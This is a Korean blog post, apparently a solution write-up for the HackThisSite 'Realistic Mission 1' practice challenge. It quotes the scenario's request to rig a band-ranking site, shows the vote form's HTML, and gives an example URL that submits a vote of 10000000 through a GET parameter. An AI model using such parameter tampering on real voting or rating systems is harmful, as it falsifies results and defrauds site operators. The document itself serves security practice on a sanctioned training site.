티스토리 뷰
| From: HeavyMetalRyan Message: Hey man, I need a big favor from you. Remember that website I showed you once before? Uncle Arnold's Band Review Page? Well, a long time ago I made a $500 bet with a friend that my band would be at the top of the list by the end of the year. Well, as you already know, two of my band members have died in a horrendous car accident... but this asshole still insists that the bet is on! I know you're good with computers and stuff, so I was wondering, is there any way for you to hack this website and make my band on the top of the list? My band is Raging Inferno. Thanks a lot, man! |
<form action="vote.php">
<input type="hidden" name="PHPSESSID" value="abcaeadfc31a5c43b2534bf995c0553f" />
<input type="hidden" name="id" value="0">
<select name="vote">
<option value=1>1
<option value=2>2
<option value=3>3
<option value=4>4
<option value=5>5
</select>
<input type="submit" value="vote!">
</form>
소스를 보면 폼값이 넘어갈때 get방식 허용되어있기때문에 주소에 변수값을 넣어서 넘겨주면 문제해결!<input type="hidden" name="PHPSESSID" value="abcaeadfc31a5c43b2534bf995c0553f" />
<input type="hidden" name="id" value="0">
<select name="vote">
<option value=1>1
<option value=2>2
<option value=3>3
<option value=4>4
<option value=5>5
</select>
<input type="submit" value="vote!">
</form>
ex) http://www.hackthissite.org/missions/realistic/1/vote.php?PHPSESSID=abcaeadfc31a5c43b2534bf995c0553f&vote=10000000&id=0
'기억하자정보 > 보안' 카테고리의 다른 글
| 해킹관련 동영상들 (0) | 2006.09.25 |
|---|---|
| Ollydbg 도움말 (0) | 2006.09.25 |
| [Hackthissite] Realistic Missions 2 (0) | 2006.09.23 |
| hackthissite | Basic Web 풀이 (0) | 2006.09.23 |
| WEB GAME!! (2) | 2006.09.20 |
- 안내
- 궁금한 점을 댓글로 남겨주시면 답변해 드립니다.
